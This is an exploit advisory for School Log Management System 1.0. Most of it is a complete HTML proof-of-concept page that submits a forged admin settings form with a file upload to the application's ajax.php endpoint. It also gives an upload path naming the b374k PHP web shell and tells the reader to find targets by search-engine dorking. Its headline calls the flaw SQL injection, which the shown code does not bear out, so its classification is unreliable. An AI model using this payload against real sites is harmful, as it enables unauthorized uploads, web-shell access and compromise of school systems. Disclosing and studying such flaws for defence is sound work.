Headline
School Log Management System 1.0 SQL Injection / Code Execution
School Log Management System version 1.0 appears to suffer from a remote SQL injection vulnerability that allows an attacker to achieve code execution. Note that the proof of concept below submits the admin settings form to `ajax.php?action=save_settings` and the path it references is a `.php` file under `admin/assets/uploads/`; the injection point itself is not shown in the PoC, so the headline classification should be confirmed against the actual vulnerable parameter.
=============================================================================================================================================| # Title : School Log Management System 1.0 WYSIWYG Settings Management Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) || # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/school-log-management-system_1.zip |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Part 01 : about-us.php[+] This payload injects code of your choice into the database via Froala is a WYSIWYG editor V: 4.2.1 . [+] Line 109 : Send the form data using fetch API (Set your target url)[+] save payload as poc.html[+] payload : <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Settings Management</title> <!-- Froala Editor CSS --> <link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/css/froala_editor.pkgd.min.css" rel="stylesheet"> <!-- Bootstrap CSS --> <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet"> <style> /* Custom Styles */ #cimg { max-width: 100%; height: auto; } #preloader2 { position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0, 0, 0, 0.5); display: flex; justify-content: center; align-items: center; z-index: 9999; } .form-group { margin-bottom: 1rem; } .form-group label { display: block; margin-bottom: .5rem; } .form-group input, .form-group textarea { width: 100%; padding: .5rem; box-sizing: border-box; } </style></head><body> <div class="container"> <form id="manage-settings" method="post" enctype="multipart/form-data"> <div class="form-group"> <label for="name"> Name</label> <input type="text" id="name" name="name" 
required> </div> <div class="form-group"> <label for="email">Email</label> <input type="email" id="email" name="email" required> </div> <div class="form-group"> <label for="contact">Contact</label> <input type="tel" id="contact" name="contact" required> <div class="form-group"> <label for="about">About Content</label> <textarea class="text-jqte" id="about" name="about"></textarea> </div> <div class="form-group"> <label for="img">Cover Image</label> <input type="file" id="img" name="img" accept="image/*" onchange="displayImg(this, this)"> <img id="cimg" src="" alt="Selected Image Preview"> </div> <button type="submit" class="btn btn-primary">Save Settings</button> </form> </div> <div class="modal fade" id="viewer_modal" role='dialog'> <div class="modal-dialog modal-md" role="document"> <div class="modal-content"> <button type="button" class="btn-close" data-dismiss="modal"><span class="fa fa-times"></span></button> <img src="" alt=""> </div> </div> </div> <!-- jQuery --> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script> <!-- Froala Editor JS --> <script src="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/js/froala_editor.pkgd.min.js"></script> <!-- Bootstrap JS (for modals) --> <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script> <script> function displayImg(input, _this) { if (input.files && input.files[0]) { var reader = new FileReader(); reader.onload = function (e) { $('#cimg').attr('src', e.target.result); } reader.readAsDataURL(input.files[0]); } } $(document).ready(function () { const editorInstance = new FroalaEditor('.text-jqte'); }); $('#manage-settings').submit(function (e) { e.preventDefault(); start_load(); $.ajax({ url: 'http://127.0.0.1/slms/admin/ajax.php?action=save_settings', data: new FormData($(this)[0]), cache: false, contentType: false, processData: false, method: 'POST', type: 'POST', error: err => { console.log(err); }, success: function 
(resp) { if (resp == 1) { alert_toast('Data successfully saved.', 'success'); setTimeout(function () { location.reload(); }, 1000); } } }); }); window.start_load = function () { $('body').prepend('<div id="preloader2"></div>'); } window.end_load = function () { $('#preloader2').fadeOut('fast', function () { $(this).remove(); }); } window.viewer_modal = function ($src = '') { start_load(); var t = $src.split('.'); t = t[1]; if (t == 'mp4') { var view = $("<video src='" + $src + "' controls autoplay></video>"); } else { var view = $("<img src='" + $src + "' />"); } $('#viewer_modal .modal-content video,#viewer_modal .modal-content img').remove(); $('#viewer_modal .modal-content').append(view); $('#viewer_modal').modal({ show: true, backdrop: 'static', keyboard: false, focus: true }); end_load(); } window.uni_modal = function ($title = '', $url = '', $size = "") { start_load(); $.ajax({ url: $url, error: err => { console.log(err); alert("An error occurred"); }, success: function (resp) { if (resp) { $('#uni_modal .modal-title').html($title); $('#uni_modal .modal-body').html(resp); if ($size != '') { $('#uni_modal .modal-dialog').addClass($size); } else { $('#uni_modal .modal-dialog').removeAttr("class").addClass("modal-dialog modal-md"); } $('#uni_modal').modal({ show: true, backdrop: 'static', keyboard: false, focus: true }); end_load(); } } }); } window._conf = function ($msg = '', $func = '', $params = []) { $('#confirm_modal #confirm').attr('onclick', $func + "(" + $params.join(',') + ")"); $('#confirm_modal .modal-body').html($msg); $('#confirm_modal').modal('show'); } window.alert_toast = function ($msg = 'TEST', $bg = 'success') { $('#alert_toast').removeClass('bg-success bg-danger bg-info bg-warning'); if ($bg == 'success') $('#alert_toast').addClass('bg-success'); if ($bg == 'danger') $('#alert_toast').addClass('bg-danger'); if ($bg == 'info') $('#alert_toast').addClass('bg-info'); if ($bg == 'warning') $('#alert_toast').addClass('bg-warning'); 
$('#alert_toast .toast-body').html($msg); $('#alert_toast').toast({ delay: 3000 }).toast('show'); } </script></body></html>[+] Path : background: url(admin/assets/uploads/1724235960_b374k.php);Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================